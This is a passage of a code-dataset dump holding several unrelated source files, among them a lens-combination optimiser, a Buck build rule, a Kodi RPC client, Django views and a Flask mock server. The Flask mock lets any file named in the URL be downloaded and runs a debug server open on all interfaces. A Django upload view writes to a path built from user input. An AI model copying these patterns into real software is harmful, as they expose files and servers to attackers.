#loop through the combinations in z from index=0 to index= length\n #of z \n for index in range(len(z)):\n #append the combinations into tfs_combo\n #if len(z.lens)<=4:\n tfs_combo.append(z[index])\n logger.debug(\"length of the tfs combinations array %s\"%(len(tfs_combo)))\n \n #loop through all the prefocus lenses\n for prefocus in prefocus_combo:\n #loop through the combinations of tfs and prefocus lenses\n for combo in tfs_combo:\n #add the lens combinations as TransfocatorCombos so that we are\n #keeping track of lists of lenses instead of lists of lists\n all_combo.append(TransfocatorCombo(prefocus,combo))\n \n logger.debug(\"Length of the list of all combinations %s\"%(len(all_combo)))\n return all_combo \n \n def find_combinations(self, target_image, n=4, z_obj=0.0, use_limits=True):\n \"\"\"Method finds all possible xrt/tfs lens combinations and calculates the xrt/tfs lens arrays with the smallest error\n from the user's desired setting (i.e. the image of the lens array is\n closest to the target image of the array the user requires.\n\n Parameters\n ----------\n target_image : float\n The deasired image of the lens array\n n : int\n The maximum number of lenses in the array. If unspecified by the\n user, it will be set to 4. Note: this does not take the xrt lens\n into account; however, there will always be at least 1 prefocus\n lens in the beam so we only need to worry about the tfs lens\n arrays.\n z_obj : float\n location of the lens object along the beam pipline in meters (m)\n \n Returns\n -------\n array\n Returns an array of lens combinations with the closest possible\n image to the target_image\n\n Note\n ----\n This mehtod does not currently take into account the case in which\n there is no tfs or xrt arrays.\n\n \"\"\"\n #create list of the image differences\n image_diff=[]\n #create list for the solutions with images closest to the target\n #image(i.e. 
with the lowest error\n closest_sols=[]\n \n #loop through all possible tfs/xrt combinations\n for combo in self.combinations:\n logger.debug(\"number of allowed lenses: %s\"%n)\n\n #check if the effective radius of the array is less than the tfs\n #safety limit and greater than the xrt safety limit\n #also check to see if the number of lenses in the array is less\n #than or equal to the efficiency limit\n #if it is more than n, the array is disregarded\n if combo.tfs.nlens<=n:\n if use_limits==True and combo.xrt.effective_radius>self.xrt_limit and combo.tfs.effective_radius \"artifact\":\n bundle_dir_name = get_bundle_dir_name(ctx)\n output = ctx.actions.declare_output(bundle_dir_name)\n return output\n\ndef assemble_bundle(ctx: \"context\", bundle: \"artifact\", parts: [AppleBundlePart.type], info_plist_part: [AppleBundlePart.type, None]) -> None:\n all_parts = parts + [info_plist_part] if info_plist_part else []\n spec_file = _bundle_spec_json(ctx, all_parts)\n\n tools = ctx.attrs._apple_tools[AppleToolsInfo]\n tool = tools.assemble_bundle\n\n codesign_args = []\n codesign_type = _detect_codesign_type(ctx)\n\n if codesign_type.value in [\"distribution\", \"adhoc\"]:\n codesign_args = [\n \"--codesign\",\n \"--codesign-tool\",\n ctx.attrs._apple_toolchain[AppleToolchainInfo].codesign,\n ]\n\n external_name = get_apple_sdk_name(ctx)\n platform_args = [\"--platform\", external_name]\n codesign_args.extend(platform_args)\n\n if codesign_type.value != \"adhoc\":\n provisioning_profiles = ctx.attrs._provisioning_profiles[DefaultInfo]\n expect(\n len(provisioning_profiles.default_outputs) == 1,\n \"expected exactly one default output from provisioning profile\",\n )\n provisioning_profiles_args = [\"--profiles-dir\"] + provisioning_profiles.default_outputs\n codesign_args.extend(provisioning_profiles_args)\n\n identities_command = ctx.attrs._apple_toolchain[AppleToolchainInfo].codesign_identities_command\n identities_command_args = [\"--codesign-identities-command\", cmd_args(identities_command)] if identities_command else []\n codesign_args.extend(identities_command_args)\n else:\n codesign_args.append(\"--ad-hoc\")\n\n codesign_args += _get_entitlements_codesign_args(ctx, codesign_type)\n\n info_plist_args = [\n \"--info-plist-source\",\n info_plist_part.source,\n \"--info-plist-destination\",\n get_apple_bundle_part_relative_destination_path(ctx, info_plist_part),\n ] if info_plist_part else []\n codesign_args.extend(info_plist_args)\n elif codesign_type.value == \"skip\":\n pass\n else:\n fail(\"Code sign type `{}` not supported\".format(codesign_type))\n\n command = cmd_args([\n tool,\n \"--output\",\n bundle.as_output(),\n \"--spec\",\n spec_file,\n ] + codesign_args)\n command.hidden([part.source for part in all_parts])\n run_incremental_args = {}\n incremental_state = ctx.actions.declare_output(\"incremental_state.json\").as_output()\n\n # Fallback to value from buckconfig\n incremental_bundling_enabled = ctx.attrs.incremental_bundling_enabled or ctx.attrs._incremental_bundling_enabled\n\n if incremental_bundling_enabled:\n command.add(\"--incremental-state\", incremental_state)\n run_incremental_args = {\n \"metadata_env_var\": \"ACTION_METADATA\",\n \"metadata_path\": \"action_metadata.json\",\n \"no_outputs_cleanup\": True,\n }\n category = \"apple_assemble_bundle_incremental\"\n else:\n # overwrite file with incremental state so if previous and next builds are incremental\n # (as opposed to the current non-incremental one), next one won't assume there is a\n # valid incremental 
state.\n command.hidden(ctx.actions.write_json(incremental_state, {}))\n category = \"apple_assemble_bundle\"\n\n if ctx.attrs._profile_bundling_enabled:\n profile_output = ctx.actions.declare_output(\"bundling_profile.txt\").as_output()\n command.add(\"--profile-output\", profile_output)\n\n if ctx.attrs._bundling_log_file_enabled:\n bundling_log_output = ctx.actions.declare_output(\"bundling_log.txt\").as_output()\n command.add(\"--log-file\", bundling_log_output)\n\n force_local_bundling = codesign_type.value != \"skip\"\n ctx.actions.run(\n command,\n local_only = force_local_bundling,\n prefer_local = not force_local_bundling,\n category = category,\n **run_incremental_args\n )\n\ndef get_bundle_dir_name(ctx: \"context\") -> str.type:\n return paths.replace_extension(get_product_name(ctx), \".\" + get_extension_attr(ctx))\n\ndef get_apple_bundle_part_relative_destination_path(ctx: \"context\", part: AppleBundlePart.type) -> str.type:\n bundle_relative_path = bundle_relative_path_for_destination(part.destination, get_apple_sdk_name(ctx), ctx.attrs.extension)\n destination_file_or_directory_name = part.new_name if part.new_name != None else paths.basename(part.source.short_path)\n return paths.join(bundle_relative_path, destination_file_or_directory_name)\n\n# Returns JSON to be passed into bundle assembling tool. It should contain a dictionary which maps bundle relative destination paths to source paths.\"\ndef _bundle_spec_json(ctx: \"context\", parts: [AppleBundlePart.type]) -> \"artifact\":\n specs = []\n\n for part in parts:\n part_spec = {\n \"dst\": get_apple_bundle_part_relative_destination_path(ctx, part),\n \"src\": part.source,\n }\n if part.codesign_on_copy:\n part_spec[\"codesign_on_copy\"] = True\n specs.append(part_spec)\n\n return ctx.actions.write_json(\"bundle_spec.json\", specs)\n\ndef _detect_codesign_type(ctx: \"context\") -> CodeSignType.type:\n if ctx.attrs.extension not in [\"app\", \"appex\"]:\n # Only code sign application bundles and extensions\n return CodeSignType(\"skip\")\n\n if ctx.attrs._codesign_type:\n return CodeSignType(ctx.attrs._codesign_type)\n sdk_name = get_apple_sdk_name(ctx)\n is_ad_hoc_sufficient = get_apple_sdk_metadata_for_sdk_name(sdk_name).is_ad_hoc_code_sign_sufficient\n return CodeSignType(\"adhoc\" if is_ad_hoc_sufficient else \"distribution\")\n\ndef _entitlements_file(ctx: \"context\") -> [\"artifact\", None]:\n if not ctx.attrs.binary:\n return None\n\n # The `binary` attribute can be either an apple_binary or a dynamic library from apple_library\n binary_entitlement_info = ctx.attrs.binary[AppleEntitlementsInfo]\n if binary_entitlement_info and binary_entitlement_info.entitlements_file:\n return binary_entitlement_info.entitlements_file\n\n return ctx.attrs._codesign_entitlements\n\ndef _should_include_entitlements(ctx: \"context\", codesign_type: CodeSignType.type) -> bool.type:\n if codesign_type.value == \"distribution\":\n return True\n\n if codesign_type.value == \"adhoc\":\n # The config-based override value takes priority over target value\n if ctx.attrs._use_entitlements_when_adhoc_code_signing != None:\n return ctx.attrs._use_entitlements_when_adhoc_code_signing\n return ctx.attrs.use_entitlements_when_adhoc_code_signing\n\n return False\n\ndef _get_entitlements_codesign_args(ctx: \"context\", codesign_type: CodeSignType.type) -> [\"_arglike\"]:\n include_entitlements = _should_include_entitlements(ctx, codesign_type)\n maybe_entitlements = _entitlements_file(ctx) if include_entitlements else None\n entitlements_args = 
[\"--entitlements\", maybe_entitlements] if maybe_entitlements else []\n return entitlements_args\n","sub_path":"buck-build/prelude/apple/apple_bundle_part.bzl","file_name":"apple_bundle_part.bzl","file_ext":"bzl","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"322932452","text":"#!/usr/bin/env python\r\n#############################################################################\r\n#\r\n# Program : redate_ancil_dump.py\r\n# Author : Neil Massey\r\n# Date : 07/01/14\r\n# Purpose : Functions to redate ancil files or dumps (translated from IDL)\r\n# Modified: SS modified to redate day (21/02/2019)\r\n#############################################################################\r\n\r\nimport sys, os, getopt\r\nfrom read_um import *\r\nfrom write_ancil import write_ancil\r\nimport array\r\nimport numpy\r\n\r\n#############################################################################\r\n\r\ndef redate_dump_fixhdr(infile, outfile, day):\r\n # read the file as a binary file\r\n fh = open(infile, 'rb')\r\n fix_hdr = read_fixed_header(fh)\r\n pp_hdrs = read_pp_headers(fh, fix_hdr)\r\n intc = read_integer_constants(fh, fix_hdr)\r\n realc = read_real_constants(fh, fix_hdr)\r\n if fix_hdr[109] > 1:\r\n levc = read_level_constants(fh, fix_hdr)\r\n else:\r\n levc = numpy.zeros([0],'f')\r\n if fix_hdr[114] > 1:\r\n rowc = read_row_constants(fh, fix_hdr)\r\n else:\r\n rowc = numpy.zeros([0], 'f')\r\n \r\n fix_hdr[29] = day\r\n\r\n for i in range(0, fix_hdr[151]):\r\n pp_hdrs[i,2] = day\r\n pp_hdrs[i,8] = day \r\n # read all the data in\r\n data = read_data(fh, fix_hdr, intc, pp_hdrs)\r\n \r\n # write out the file\r\n write_ancil(outfile, fix_hdr, intc, realc, pp_hdrs, data, levc, rowc)\r\n fh.close()\r\n\r\n#############################################################################\r\n\r\nif __name__ == \"__main__\":\r\n opts, args = getopt.getopt(sys.argv[1:], 'i:o:d:', ['input==', 'output==', 'day=='])\r\n calendar = \"-1\"\r\n periodic = False\r\n dump = False\r\n strip_cm = False\r\n for opt, val in opts:\r\n if opt in ['--input=','--input', '-i']:\r\n infile = val\r\n if opt in ['--output=','--output', '-o']:\r\n outfile = val\r\n if opt in ['--day=','--day', '-d']:\r\n date = val\r\n try:\r\n day = int(date)\r\n except:\r\n print(\"Day in format dd\")\r\n sys.exit(0)\r\n\r\n redate_dump_fixhdr(infile, outfile, day)\r\n","sub_path":"redate_dump_fixhdr_day.py","file_name":"redate_dump_fixhdr_day.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"500352401","text":"from fb_post.models import Comment\nfrom fb_post.exceptions import InvalidCommentException\nfrom .validation import check_for_user, is_valid_reply_content\n\ndef reply_to_comment(user_id, comment_id, reply_content):\n try:\n check_for_user(user_id)\n\n comment = Comment.objects.select_related('parent_comment',\n 'post').get(id=comment_id)\n\n new_comment_id = comment_creation(user_id, comment_id,\n reply_content, comment)\n return new_comment_id\n\n except Comment.DoesNotExist:\n raise InvalidCommentException\n\ndef comment_creation(user_id, comment_id, reply_content, comment):\n if comment.parent_comment_id:\n parent_comment_id = comment.parent_comment_id\n is_valid_reply_content(reply_content)\n reply_id = Comment.objects.create(content=reply_content,\n commented_by_id=user_id,\n parent_comment_id=parent_comment_id,\n post_id=comment.post_id).id\n return 
reply_id\n\n comment_id = Comment.objects.create(content=reply_content,\n commented_by_id=user_id,\n parent_comment_id=comment_id,\n post_id=comment.post_id).id\n return comment_id\n","sub_path":"clean_code/clean_code_submissions/clean_code_assignment_004/fb_post/utils/.~c9_invoke_k5swzK.py","file_name":".~c9_invoke_k5swzK.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"257644069","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse, JsonResponse\n\nfrom users.models import Users\nimport os\n\n\ndef uploadCertification(request):\n image = request.FILES['name']\n print(image)\n print('uploadUserShot')\n type = request.POST.get('type')\n basedir = 'D:\\\\ProgramSoft\\\\Git\\\\Virtual-try-on\\\\FiRoom_backend\\\\static\\\\masterCertification\\\\'\n if not os.path.exists(basedir + type + '.jpg'):\n with open(basedir + type + '.jpg', 'wb') as f:\n f.write(image.read())\n f.close()\n return JsonResponse({'code': 0, 'data': '', 'msg': 'success'})","sub_path":"FiRoom_backend/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"74471485","text":"from socket import *\nfrom threading import Thread\n#模拟聊天室\n\ndef sentMsg():#发消息\n while True:\n sendData=input(\"<<\")\n udpSocket.sendto(sendData.encode(\"GB2312\"),(destIp,destPort))\n\ndef getMsg():#获取消息\n while True:\n recvData=udpSocket.recvfrom(1024)\n print(\"[%s]:%s\",str(recvData[1]),recvData[0].encode(\"GB2312\"))\n\nudpSocket=None\ndestIp=\"\"\ndestPort=0\n\ndef main():\n global udpSocket\n global destIp\n global destPort\n\n udpSocket = socket(AF_INET, SOCK_DGRAM)\n destIp = input(\"请输入对方Ip\")\n destPort = input(\"请输入对方的端口\")\n\n udpSocket.bind(('',6080))\n\n T_Sent=Thread(target=sentMsg)\n T_Get=Thread(target=getMsg)\n\n T_Sent.start()\n T_Get.start()\n\n T_Sent.join()\n T_Get.join()\n\n\nif __name__=='__main__':\n main()","sub_path":"demo/Talk_With_Eve.py","file_name":"Talk_With_Eve.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"72603260","text":"from datetime import datetime, timedelta\nfrom json import dumps as dictstr\nfrom logging import debug as log, warning as logw\n\nimport requests\nfrom singleton_decorator import singleton\n\n\n# JSON RPC API reference: https://kodi.wiki/view/JSON-RPC_API/v9\n\n\n@singleton\nclass KodiRpc:\n URL: str = \"http://localhost:8080/jsonrpc\"\n CACHE_VALID_TIME: int = 1200\n\n def __init__(self):\n self._channelList = {}\n self._playing = False\n self._paused = False\n self._broadcastsList = []\n log(\"KodiRpc: Created\")\n\n @classmethod\n def _liststr(cls, lst: list) -> str:\n retstr = '['\n for item in lst:\n retstr = retstr + '\"' + item + '\", '\n retstr = retstr[:-2]\n retstr = retstr + ']'\n return retstr\n\n @classmethod\n def _build_json(cls, method: str, request_id: str, params: dict = None) -> str:\n base = '{\"jsonrpc\": \"2.0\", '\n json = base + '\"method\": \"' + method + '\", \"id\": \"' + request_id + '\"'\n if params is not None and len(params) > 0:\n json = json + ', \"params\": {'\n for param, value in params.items():\n if isinstance(value, str):\n json = json + '\"' + param + '\": \"' + value + '\", '\n elif isinstance(value, dict):\n json = json + '\"' + param + '\": ' + dictstr(value) + \", \"\n elif 
isinstance(value, list):\n json = json + '\"' + param + '\": ' + cls._liststr(value) + \", \"\n else:\n json = json + '\"' + param + '\": ' + str(value) + ', '\n json = json[:-2]\n json = json + \"}\"\n json = json + \"}\"\n return json\n\n @classmethod\n def _get_tv_ch_groups(cls, request_id: str) -> list:\n log(\"KodiRpc: Getting all TV channel groups\")\n method = \"PVR.GetChannelGroups\"\n params = {\"channeltype\": \"tv\"}\n rpc_call = cls._build_json(method, request_id, params)\n response = requests.post(url=cls.URL, data=rpc_call)\n return response.json()['result']['channelgroups']\n\n @classmethod\n def _get_main_ch_group(cls, request_id: str) -> int:\n log(\"KodiRpc: Getting main channel group\")\n ch_groups = cls._get_tv_ch_groups(request_id)\n return ch_groups[0]['channelgroupid']\n\n @classmethod\n def _get_channels(cls, request_id: str) -> list:\n log(\"KodiRpc: Getting channels\")\n main_ch_group = cls._get_main_ch_group(\"chg\")\n method = \"PVR.GetChannels\"\n params = {\"channelgroupid\": main_ch_group}\n rpc_call = cls._build_json(method, request_id, params)\n response = requests.post(url=cls.URL, data=rpc_call)\n return response.json()['result']['channels']\n\n @classmethod\n def _play_channel(cls, request_id: str, channel_id: int) -> bool:\n log(\"KodiRpc: Playing channel \" + str(channel_id))\n rpc_call = cls._build_json(\"Player.Open\", request_id, {'item': {'channelid': channel_id}})\n response = requests.post(url=cls.URL, data=rpc_call)\n return response.json().get('result') == 'OK'\n\n def _get_channel_list(self) -> dict:\n log(\"KodiRpc: Getting channel list\")\n if len(self._channelList) > 0:\n return self._channelList\n else:\n log(\"KodiRpc: Caching channel list\")\n chs = self._get_channels(\"chs\")\n for ch in chs:\n if ch['label'][-3:] == ' HD':\n ch['label'] = ch['label'][:-3]\n if ch['label'].upper() not in self._channelList:\n self._channelList[ch['label'].upper()] = ch['channelid']\n return self._channelList\n\n def _get_channel_id_by_name(self, name: str) -> int:\n log(\"KodiRpc: Getting channel \" + name)\n if len(self._channelList) == 0:\n self._get_channel_list()\n return self._channelList.get(name)\n\n def _get_channel_broadcasts(self, name: str) -> list:\n log(\"KodiRpc: Getting broadcasts of \" + name)\n channel_id = self._get_channel_id_by_name(name)\n if channel_id is not None:\n rpc_call = self._build_json(\"PVR.GetBroadcasts\", \"gbrd\", {'channelid': channel_id,\n 'properties': ['starttime']})\n response = requests.post(url=self.URL, data=rpc_call).json()\n if response is None:\n logw(\"KodiRpc: Kodi has no broadcasts for this channel\")\n return []\n else:\n return response['result'].get('broadcasts')\n else:\n logw(\"KodiRpc: Channel does not exist\")\n return []\n\n def _get_next_broadcasts(self, name: str) -> list:\n log(\"KodiRpc: Getting next broadcasts of \" + name)\n broadcasts = self._get_channel_broadcasts(name)\n if broadcasts is not None:\n return list(filter(\n lambda x: datetime.strptime(x['starttime'], '%Y-%m-%d %H:%M:%S') >= datetime.now() - timedelta(days=1),\n broadcasts))\n else:\n return []\n\n def _get_all_next_broadcasts(self) -> list:\n log(\"KodiRpc: Getting all next broadcasts\")\n if len(self._channelList) == 0:\n self._get_channel_list()\n if len(self._broadcastsList) == 0:\n log(\"KodiRpc: Caching broadcasts...\")\n for ch in self._channelList:\n self._broadcastsList.extend(self._get_next_broadcasts(ch))\n else:\n self._broadcastsList = list(filter(\n lambda x: datetime.strptime(x['starttime'], '%Y-%m-%d %H:%M:%S') 
>= datetime.now(),\n self._broadcastsList))\n return self._broadcastsList\n\n def play_pause(self) -> bool:\n log(\"KodiRpc: Play/pause request\")\n rpc_call = self._build_json(\"Input.ExecuteAction\", \"plps\", {'action': 'playpause'})\n response = requests.post(url=self.URL, data=rpc_call).json()\n self._paused = not self._paused\n return response.get('result') == 'OK'\n\n def get_channel_names(self) -> list:\n log(\"KodiRpc: Getting channel names\")\n if len(self._channelList) == 0:\n self._get_channels(\"chs\")\n return list(self._channelList.keys())\n\n def play_channel(self, channel_name: str) -> bool:\n log(\"KodiRpc: Request to play \" + channel_name)\n channel_id = self._get_channel_id_by_name(channel_name.upper())\n if channel_id is None:\n logw(\"KodiRpc: Channel not found\")\n return False\n else:\n self._playing = True\n self._paused = False\n return self._play_channel(\"playch\", channel_id)\n\n def stop(self) -> bool:\n log(\"KodiRpc: Request to stop\")\n if not self._playing:\n logw(\"KodiRpc: Not playing anything\")\n return False\n else:\n rpc_call = self._build_json(\"Input.ExecuteAction\", \"stp\", {'action': 'stop'})\n response = requests.post(url=self.URL, data=rpc_call).json()\n if response.get('result') == 'OK':\n self._playing = False\n return True\n else:\n return False\n\n def get_next_time(self, name: str) -> datetime:\n log(\"KodiRpc: Getting next time schedule for \" + name)\n self._get_all_next_broadcasts()\n for br in self._broadcastsList:\n if br['label'].upper() == name.upper():\n return datetime.strptime(br['starttime'], '%Y-%m-%d %H:%M:%S')+timedelta(days=1)\n\n def is_playing(self):\n log(\"KodiRpc: Getting playing status\")\n return self._playing\n\n def is_paused(self):\n log(\"KodiRpc: Getting pause status\")\n return self._paused\n\nif __name__ == '__main__':\n print(KodiRpc().get_next_time('Cuarto Milenio'))","sub_path":"lib/kodiCtrl.py","file_name":"kodiCtrl.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"258527908","text":"from django.core.mail import EmailMessage\nfrom django.conf import settings\n\ndef file_mail(bak_name, subject, email_from, email_to):\n '''发送附件'''\n email = EmailMessage(\n subject,\n 'Body goes here',\n email_from, # 发件人\n email_to, # 收件人\n headers={'Message-ID': 'foo'},\n )\n email.attach_file(bak_name, mimetype=None)\n email.send()","sub_path":"apps/graincentre/utils/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"437516667","text":"\"\"\"\nCreated on Oct 31, 2014\n\n@author: Jay Atkinson\n\"\"\"\n\nimport sys\nsys.path.append(\"../\")\n\nimport unittest\nfrom copy import deepcopy\nfrom TestData import test_module, AnyXmlData\nfrom pyyen.yang.compiler.compiler import evaluate, tag_prefixes\nfrom pyyen.yang.parser.parser import parse\nfrom pyyen.yang.compiler.compiler_tree import initialize_tree\nfrom pyyen.yang.compiler.evaluate_anyxml import evaluate_anyxml, AnyXmlException\n\n\nclass EvaluteAnyXmlTest(unittest.TestCase):\n\n def test_anyxml_not_found(self):\n root = initialize_tree(parse(\n test_module,\n is_file=False))\n compiled = deepcopy(root)\n self.assertFalse(evaluate_anyxml(compiled))\n\n def test_anyxml_found(self):\n root = initialize_tree(parse(\n AnyXmlData.test_anyxml_module,\n is_file=False))\n compiled = deepcopy(root)\n self.assertTrue(evaluate_anyxml(compiled))\n\n def 
test_anyxml_toomany(self):\n root = initialize_tree(parse(\n AnyXmlData.test_anyxml_too_many,\n is_file=False))\n compiled = deepcopy(root)\n with self.assertRaises(AnyXmlException):\n evaluate_anyxml(compiled)\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"karan/workSpace/package/code_generation/pyyen/tests/test_EvaluateAnyXml.py","file_name":"test_EvaluateAnyXml.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"346486047","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n'''\nGraph algorhitms (depth-first and limited depth-first search) visualisation.\n\nBackend (application logic)\n\nBy K.Ivenkov \n03.2012\n'''\n\nclass Vertice(object):\n '''Holds a graph vertice with its' name and visual level'''\n\n def __init__(self, name = 'A', level = 0):\n self.name = name\n self.level = level\n\n\nclass Graph(object):\n '''\n Holds the graph vertice list and edge(tuple) list.\n Provides vertice/edge adding/removal interfaces.\n '''\n\n def __init__(self):\n self.vertices = []\n self.edges = []\n\n def get_vertice_by_name(self, name):\n '''\n Returns a graph vertice with a specified name or raises an exception\n '''\n for i in self.vertices:\n if i.name == name:\n return i\n else:\n raise Exception('Vertice not found!')\n\n def get_vertices_by_level(self, level):\n '''\n Returns all vertices from a selected level, sorted by name.\n A convenience method for graph UI display.\n '''\n return sorted(\n [v for v in self.vertices if v.level == level],\n key = lambda vert: vert.name\n )\n\n def add_vertice(self, name, level):\n '''\n Adds a vertice with the specified name and level to the graph\n '''\n for v in self.vertices:\n if v.name == name:\n raise Exception('This vertice already exists!')\n\n self.vertices.append(Vertice(name, level))\n\n def remove_vertice(self, obj):\n '''\n Removes a vertice with the specified name \n or a vertice object from the graph\n '''\n removable = self.get_vertice_by_name(obj) if type(obj) == str else obj\n\n removable_edges = [e for e in self.edges if removable in e]\n for re in removable_edges:\n self.edges.remove(re)\n\n self.vertices.remove(removable)\n \n def edit_vertice(self, obj, name = None, level = None):\n '''\n Edits a vertice with the specified name \n or a vertice object from the graph.\n If new name or level are not given the old ones are kept.\n ''' \n editable = self.get_vertice_by_name(obj) if type(obj) == str else obj \n editable_edges = [e for e in self.edges if editable in e]\n \n if name != None:\n for v in self.vertices:\n if v != editable and v.name == name:\n raise Exception('This vertice already exists!') \n newname = name\n else:\n newname = editable.name\n \n if level != None:\n newlevel = level\n else:\n newlevel = editable.level\n \n for ee in editable_edges:\n for eei in [ee[0], ee[1]]:\n if eei == editable:\n eei.name = newname\n eei.level = newlevel\n \n editable.name = newname\n editable.level = newlevel \n\n def add_edge(self, beginning, end):\n '''\n Adds an edge to the graph,\n connecting the vertices with the specified names\n '''\n for e in self.edges:\n if e[0].name == beginning and e[1].name == end:\n raise Exception('This edge already exists!')\n self.edges.append((\n self.get_vertice_by_name(beginning),\n self.get_vertice_by_name(end)\n ))\n\n def remove_edge(self, beginning, end):\n '''\n Removes an edge from the graph based on connected vertice names\n '''\n for e in self.edges:\n if e[0].name == 
beginning and e[1].name == end:\n self.edges.remove(e)\n break\n","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"141176472","text":"#coding: utf-8\nfrom django.shortcuts import render\nfrom django.http import JsonResponse, HttpResponseRedirect\n\nimport urllib, urllib2\n\ndef post_data(apis, args):\n result = ''\n error = ''\n base_apis = 'http://127.0.0.1:8080'\n data = urllib.urlencode(args)\n try:\n f = urllib2.urlopen(base_apis+apis, data)\n result = f.read()\n f.close()\n except:\n error = 'CANNOT connect to service: %s%s' % (base_apis, apis)\n return result, error\n\ndef index(request):\n result = ''\n error = ''\n if request.method == 'GET':\n if not request.GET:\n result = 'Welcome to public info. system!'\n elif 'args' in request.GET and 'apis' in request.GET:\n apis = request.GET['apis']\n args = request.GET['args']\n result, error = post_data(apis, {'data': args})\n else:\n error = 'CANNOT find key=data'\n else:\n error = 'ONLY handle GET request'\n\n return render(request, 'index.html', locals())\n","sub_path":"pscaffold/pweb/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"2620070","text":"'''\nInstall:\npip install flask\n\nRun with python CLI:\npython flask_mock_service.py\n\nNotes:\n- Method is default as GET\n'''\n\n\nimport os\n# import ipdb\nfrom flask import Flask, request, send_file, render_template\nimport json\nfrom time import sleep\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/json', methods=['POST', 'GET'])\ndef test_json():\n sleep(0.2) # simulate network delay.\n return '{\"code\": 1, \"message\": \"Hello, World!\" }'\n\n# Request headers\n# http://flask.pocoo.org/docs/1.0/api/#flask.Request\n# https://werkzeug.palletsprojects.com/en/0.15.x/datastructures/#werkzeug.datastructures.Headers\n@app.route('/request_headers')\ndef test_req_headers():\n headers = request.headers\n \n # Get header values\n # get(key, default=None, type=None, as_bytes=False)\n # Return None if not found\n user_agent = headers.get('User-Agent')\n if user_agent is not None:\n return 'Header User-Agent in the request is %s.' % user_agent \n else:\n return 'Header User-Agent does not exist in the request.'\n\n# Request body content\n# http://flask.pocoo.org/docs/1.0/api/#flask.Request\n@app.route('/request_body', methods=['POST', 'GET'])\ndef test_req_body():\n # get_data(cache=True, as_text=False, parse_form_data=False)\n request_body = request.get_data()\n request_body = request_body.decode('utf-8') # decode if it is byte string b''\n return 'Request body content is\\n%s' % request_body\n \n # Output for request with '{\"key1\":\"value1\",\"key2\":2}':\n # Request body content is b'{\"key1\":\"value1\",\"key2\":2}'\n\n# Request body content as JSON \n# Parse and return the data as JSON. If the mimetype does not indicate JSON (application/json, see is_json), this returns None unless force is true. 
\n@app.route('/request_body_json', methods=['POST', 'GET'])\ndef test_req_body_json():\n # get_json(force=False, silent=False, cache=True)\n # Note: return is actually a dict\n \n # Note: is_json is changed to a property than a method.\n if request.is_json:\n return 'Request body content as json:\\n%s' % json.dumps(request.get_json(cache=False),indent=4)\n else:\n return r'Request has no header application/json.'\n\n@app.route('/request_body_force_json', methods=['POST', 'GET'])\ndef test_req_body_force_json():\n return 'Request body content forced as json:\\n%s' % json.dumps(request.get_json(force=True, cache=False),indent=4)\n '''Output example:\n Request body content forced as json:\n {\n \"key1\": \"value1\",\n \"key2\": 2\n }\n '''\n\n# get HTML form data https://www.w3schools.com/html/html_forms.asp\n'''Raw forma data request:\ncontent-type:\"multipart/form-data; boundary=--------------------------706175916610648661144841\"\ncontent-length:278\n\n----------------------------706175916610648661144841\nContent-Disposition: form-data; name=\"username\"\n\npeter\n----------------------------706175916610648661144841\nContent-Disposition: form-data; name=\"password\"\n\npwd\n----------------------------706175916610648661144841--\n'''\n@app.route('/request_form_data', methods=['POST', 'GET'])\ndef test_req_form_data():\n return 'Request body:\\n%s\\n%s' % (request.form[\"username\"],request.form[\"password\"])\n\n@app.route('/hello/')\n@app.route('/hello/')\ndef hello(name=None):\n return render_template('hello.html', name=name)\n\n# return a file\n# http://flask.pocoo.org/docs/1.0/api/#flask.send_file\n@app.route('/download_file', methods=['POST', 'GET'])\n@app.route('/download_file/', methods=['POST', 'GET'])\ndef test_download_file(file='pytest.ini'):\n try:\n # return send_file('report.zip', as_attachment = True, attachment_filename='report.zip') # zip file\n return send_file(file, as_attachment = True, attachment_filename=file) # any file\n except Exception as e:\n return str(e)\n \n# Run in HTTP \n# When debug = True, code is reloaded on the fly while saved\n# app.run(host='127.0.0.1', port='5000', debug=True) \napp.run(host='0.0.0.0', port='5000', debug=True) \n\n# Run in HTTPS\n# https://werkzeug.palletsprojects.com/en/0.15.x/serving/#quickstart\nssl_context_ = ('ssl_keys/key.crt', 'ssl_keys/key.key')\n# app.run(host='127.0.0.1', port='5000', ssl_context=ssl_context_)\n# output: Running on https://127.0.0.1:5001/\n","sub_path":"Scripts/flask_mock_service.py","file_name":"flask_mock_service.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"221220613","text":"import sys\n\ndef run(text, blocksize, wordfile):\n\tfw = open(wordfile,\"r\")\n\twords = fw.read().split('\\n')\n\toffsets = setOffsets(words)\n\tfp = open(text, \"rb\")\n\tplaintext = fp.read()\n\tfw = open(\"out1.txt\", \"w\")\n\tfm = open(\"out2.txt\", \"w\")\n\tfor word in words:\n\t\tprint(word)\n\t\tmatch = traverse(word, words, plaintext, 